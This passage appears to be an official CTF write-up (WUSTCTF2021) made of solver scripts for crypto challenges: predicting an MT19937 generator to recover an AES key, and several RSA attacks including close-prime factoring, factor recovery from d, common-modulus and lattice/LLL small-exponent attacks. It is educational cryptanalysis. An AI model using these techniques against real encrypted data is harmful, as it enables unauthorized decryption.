c = b'\xd1\xfb\xd3\xf0U\x14\x18\xa9Yf=\xa6\x7fJ\xd0aZ=\xf7\xf6\x1e]\xe7\x07\xbd\x0b\xc9\xf8\xe7k\xa7\x16\xc1Z:\xbf\xde\xea=3\xe0\x82\xf0\xca\xd2R\x91\xf5\x0f\xd1\x06\x99G\xf6\x8dh\x9c\x14Wi\xaf\xdbFL'
p = MT19937Predictor()
for i in range(len(keys)):
    if i == 0 or i == 1:
        p.setrandbits(keys[i], 96)
    elif i == 2:
        p.setrandbits(keys[i], 160)
    else:
        p.setrandbits(keys[i], 32)
key = long_to_bytes(p.getrandbits(128))
cipher = AES.new(key, AES.MODE_ECB)
print(cipher.decrypt(c))

rsa1

from gmpy2 import *
from libnum import *
from sympy import Symbol, solve

n = 26305215103655644423271873654270896239286789695124090349749665534703077917412304839568833642664450313935099298310980853882272879981733372730292018544572625316902809164514982172181951319743072017697845536018391193871280565807620618786757590917994266113737303548654644579447152708491947981939693209377062932887079053535685222915049638973744785910187846488048054614595896905717548173503097932486976548606688284094985163387830871173351156872303901802063874643159872076045421856161697020709841563253543301088673347562874178275457662923268303751458373213379823091743254295392098852050657389100668196543581156089543387981749
s = 4323761888398018609852335503896306767680254689118307249919076945474100280053222216117890335097280655812579700210142850972114032619375512508094444700268269861295454361479936323488734938967486887087065985770337167952405916865514342667568344884512919390473013721005783345127779614050256684329541419938215219111638334871769224566807758669615177139619330644265349270609231736366888506999373399354453570974856230273436956657673552797254044789898850371608837651642705304346761776584170067536342839950077554921714223414452726231759701672899981770205900654174771977192152231671555687060576625055995576371428030016472160229195
c = 18524879875046454765780419291902161505187119049317257440202645362184543856980037891446139747396472606884190295519693050825702398302375035356073354030439092479076493350280491879942676232543272035009619776448668367631674751270025422471697604807309328948811730211796077194562605273068248003067084062604953180981092602825269082443194821795267533259542345280789423885313715011198756408238675212294964169231866750121782891392974982538883759460499654964916672646713561365268497621669918260512318121987464087203488943192447244656120553657904643768811055634526867642121977282747786019413676386087742587120310706285467632914627
s = invert(s, n)
p = Symbol('p')
q = Symbol('q')
p, q = solve([p*q-n, 1314*p-520*q-s], [p, q])[1]
p = int(p)
q = int(q)
e = 0x10001
d = invert(e, (p-1)*(q-1))
print(n2s(int(pow(c, d, n))))

rsa2

from gmpy2 import *
from libnum import *

n = 2387626545085756713585102877878108862015179080332961598635902226358817519910295819153349225103418927970241049968506375997
e = 65537
c_mod_p = 647648029783204084679833378591490303778808042166748545307033
c_mod_q = 716978243624820144982668239669070880505037391756433243913335
p = iroot(n, 2)[0]
for i in range(1000):
    p -= 1
    if is_prime(p):
        q = next_prime(p)
        if p * q == n:
            break
d = invert(e, (p-1)*(q-1))
c = (c_mod_p*invert(q, p)*q + c_mod_q*invert(p, q)*p) % n
print(n2s(int(pow(c, d, n))))

rsa3

from gmpy2 import *
from random import *
from libnum import *

n = 18896787369812506729161146792420582463075195289705130332145125441873359008259477778705050612028016445531171582699463469223129134497144553118164991259539504187512021208315754514545996574862689888723728779368278057158884309498791988824815380906489884221955569016913002047690134495021638325076324337204120358289197345473645253964897309936634674685256494467965994763346209088569312900310384221856890129638589708704488570062170587822159840004471847429651335596065845176922611177484979368701185198370143451554032097774883881063941164928195206151285053023900417539545188981446823285592433963817981924569149446287916824382561
d = 5703031224919077324199739420591218709082873607810515782527403392203078685694557440606179655084946477198544985797529455998356213302699576058168444727748170549839026313064029609887624795981035801288838847172210685453187859645339376946854805971427795291607171515106310442975161667104581906887477593810523773846781119913091652230585316578697966956441025050411703279543735184615408372827086048067763849304020844971586419985599715291049252337301504847183917086038225366804009601071701854587257618991903027592792223359879103979050158387898497645317134119316587856020926045834487915948391807346208594166279941244305061329677
friend_keys = [111697, 106721, 116423, 88843, 119159, 70639,
80819, 74489, 121931, 101141]
c = 11994381627759026162899170243195205997473390753474105847444301599471367630328999329971554672898042711258332343414555886491105235450415874967500999777727188222201701790615800443999694661391161603608205580744046340685740132462956669428633202538875197708853419127000877908034155683418476839027176847825085191766500657063936087300707648173167638212184409940441341192494973780078520658057628747235702262261650533074207402665937459065342008813881483658655820794105733254390600096188629251786257035958039797032257689446780150685916517843665881340793492146980771808706103032498053602112046452376378597181639545983846067945876
e = 0x10001
def getpq(n, e, d):
    while True:
        k = e * d - 1
        g = randint(0, n)
        while k % 2 == 0:
            k = k // 2
            temp = pow(g, k, n) - 1
            if gcd(temp, n) > 1 and temp != 0:
                return gcd(temp, n)

p = getpq(n, e, d)
q = n // p
e = friend_keys[::-1]
for i in e:
    d = invert(i, (p-1)*(q-1))
    c = pow(c, d, n)
print(n2s(int(c)))

rsa4

from gmpy2 import *
from libnum import *
n = 18344208622226145563275332631675852812637974117269410580356372484730868630041087771967863177399468436907179629991713287958712918155881322973807806301979120718337971766642141160715457959104230009865832490334268400708057378872793969706058766934173901720807601381260226109710528613914848911497044918273137096903522367120819016923613011696956531078735040866726836147244627617752866449680818575750555372925099203864465221467261643732258403282300830500857008951036100240417305652712966271750963365056888669691476588673457169183575547654173584411488289083479722447529687480093984214874840116386641308648928664471249163053399
c = 5799835212682670854600787421394304700766812650929331808305024781919809808414116741938033087654173522429848434831011913540857883976763801585735031494044357475999623804769581806159695530735320829983994397494910262812269266183428964227240479098342185016875916463463869275180539449912347431388217372994987664171819970167145891087464365899986673967607036447794731478364868669512779723692729123522060403205286021628536236794321362684707698114447595523828110511521587142146690874947566042115081767036515192408523157587036063428678576881221634685127738856946514330198100929281963428110917369571549814920857266365740708152342
e = 0x10001
p = gcd(n, c)
q = n // p
d = invert(e, (p-1)*(q-1))
print(n2s(int(pow(c, d, n) // p // 2021 // 1211)))

rsa5

from gmpy2 import *
from libnum import *

n = 89114498420780604917531033169596392769455738343415866175560827716329038325885040230287167130153562721085218031290598924393710777384195303868086861588496841776165960494754159665639269842671254641757507534815336115279112577992964099982530678699389798633559364922445110277096686903849847611549099340416648410741
c1 = 5735952141642500488957438428695439035757844707618704182655499843027856939311070755815954816072248816712526137792678092545003791094632649549645878951707384683857212799418894784114432305066187852999119421690587457065466839964716069311139937099286027346944058896149918834128185367804403864368930212475453509851
c2 = 83661280370185647448453005460717066890991000188427326405001096935902371566724181207272659273801621639886691480155364009831593695466677783865595971645100536369801815619337129766823938463338128554716970036817952870569822208326583141745930557453969795334892493524974870629590649696998539807821542822600655060074
e1 = 65536
e2 = 270270
s = gcdext(e1, e2)
s1 = s[1]
s2 = s[2]
if s1 < 0:
    s1 = -s1
    c1 = invert(c1, n)
elif s2 < 0:
    s2 = -s2
    c2 = invert(c2, n)
m = pow(c1, s1, n) * pow(c2, s2, n) % n
m = iroot(m, gcd(e1, e2))[0]
print(n2s(int(m)))

rsa6

# sage
from Crypto.Util.number import *

c =
792534797236942516602405443517723052170140376689765593638997623833
525502332370366568752423701218537804193723719392319671016105315635
523406644164531971118370184232962015770416637115765071722283961964
827115212868237291312609636578368752056498293716848478808131767547
446308313278458238418750786925588522885746781783147603597170544986
208068994799423044583975977509062978092895646925325128691641745565
565104807528491490973536526192938132172849121017114953492710063898
844399695122256742298334030165735207100449171055079117496974415925
167478748602909845452507560308635453872490997120605713695943364490
553428102487682775669613775497156017316624305860430262666205570472
621762251045983266546589262742077056901761505758616282139860180520
294114130199610630948384554435331068898512856688812062730461978896
550717296237834283267302523654274510531108136128918294741736300869
899449462228229808281574649010180112666932831903406027085633419430
025271852343210666327353337433569778504453080170055493551867512226
748755362216403339448564059716305656384237185703151486523517715746
219841327983087970570848592955861083128624324922914558382778188473
508354381883997155444299428898747384287358825771965832858103389182
2672997846833635917945202914668666249069209
N =
327704199063655154339194866047748377300483661546348646619543042402
260458534101350044000928583250118734194187256215886625771489682622
806492392158515139856977282405831771426953889407535449903946471081
769989651651591222623997395529035591781660724645156930487601579241
488206427939500937938255588575188735472745545946966631822161787569
690670592431700668322671046133380934851245111908808167859798212265
435088714280150547423032692815776965063410936310739819923896759441
335001874930520763236975226711207654895127866843378461328154795776
319242290600812698882674645791266238574096744538101900116337068936
957681128459670057096430909525261047967406584507167977208793797870
831858199445206260549902066723878612723426168458993576999172766781
960053959813246897054556640370355234535221471564607870502627719243
185861171079980645221020435603883953809425799723857745727457620742
919434348781413514988026742127568571934186958953140598517500511323
011929458037325804993377002532922851586492715993738894057370890612
824581248076082409851337738126905208244299232520865145447167051764
102587067960512092944943632792165293701233755265831135001570237083
525408605939160927853199431652266761149838259483979450360702066085
191758469080084577999970704509262494734276631
e1 =
113093816717144841270493376736752441673022256694148583901036760385
290294469429291287395932962657459627279948131588586212784590640516
333875415213429718659370434377813079419901793552309461703882586527
503420999488191213528380154291270445702806410792319417099800769397
301837093257916765727595155732721396733301006197816845511287287300
240373894663383088203656193754454195781571647148298850615901090657
526494250418115895409707363373152838151538570469978232752856573089
149548109243765929129792122940993776991512134978235283946198861884
114007985343254462515565194689101887047325062995222232830812585485
386335674066695574712424013748788932584416194906037669948036361191
560447424191340446408227050317480535979753006991332324053550385053
870295648784077492339350541225982286056281016618014141105366605422
149895221611592416532345771815704307846206281439784932410973601384
402414039900782254330313269415078960064305344681778478762050176778
461863907418405687378915582516510150832198276943089812715818203025
913800315465878924192853193803827276622946514235810979197716378589
261982901063684489176009723390727783448898996904743318965120718829
513279206531437783722261301609689797505310206968838386508504975439
758618002450017650730285740872724819939789165
e2 =
520784802242233176685694625439335648020233315036318660607609058232
253756893711940811689671211031740538418030746960229830407033429274
724173761594060357040912794702362534613844927042210511917607360605
543444697905470318310052804430718259068491360683455456766060272908
336208271643139931316184313237522767343589523009450774630417666521
249374919345775996757611711031293044212158686999046988150214592108
157111459059701972034578216909910625389552085786113690770133454547
457764623704458887788524087623286723476033810982968611147489646670
169496808853835334718258960849680027392565778520201820536838989790
882852419430752827631200573362834437858845826550336938550475796906
207139877232034439683439393971802337498729658644929705383526075801
274333885777281973827854475388302632779455717147494603818517391466
719503054220543434394727883299649591903578031268240738900411112406
618652725850847223731909368279406071589358172777730956937781876825
949576871569149291236837622348525849820772458720098637391873811567
556867266331105515676590090610339970832411635514893234739688540601
082980853279295821658846621558746399768293470665616360020175164850
074194164460647394129842296631518274348500179159711083883316628656
10040555809970494140145365617095067391830661
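# a: assumed size of the private exponents relative to N (d < N**a)
a = 0.198 # 811./4097
M1 = N**0.5
M2 = N**(a + 1)
# Column scaling that balances the entries of the target vector
D = diagonal_matrix(ZZ, [N, M1, M2, 1])
M = matrix(ZZ, [[1, -N, 0, N**2],
                [0, e1, -e1, -e1 * N],
                [0, 0, e2, -e2 * N],
                [0, 0, 0, e1 * e2]]) * D
# The first LLL-reduced row t is taken as x * M for an integer vector x
L = M.LLL()
t = vector(ZZ, L[0])
x = t * M**(-1)
# x[1] / x[0] * e1 approximates phi(N); int() truncates it
phi = int(x[1] / x[0] * e1)
# c is decrypted with the private exponent matching e = 0x10001
d = inverse(0x10001, phi)
m = pow(c, d, N)
print(long_to_bytes(m))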

WUSTCTF2021 Official Write-up
https://rookieterry.github.io/2021/12/11/WUSTCTF2021官方Write-up/
Author
HackerTerry
Published
Saturday, December 11, 2021, 10:15 PM
License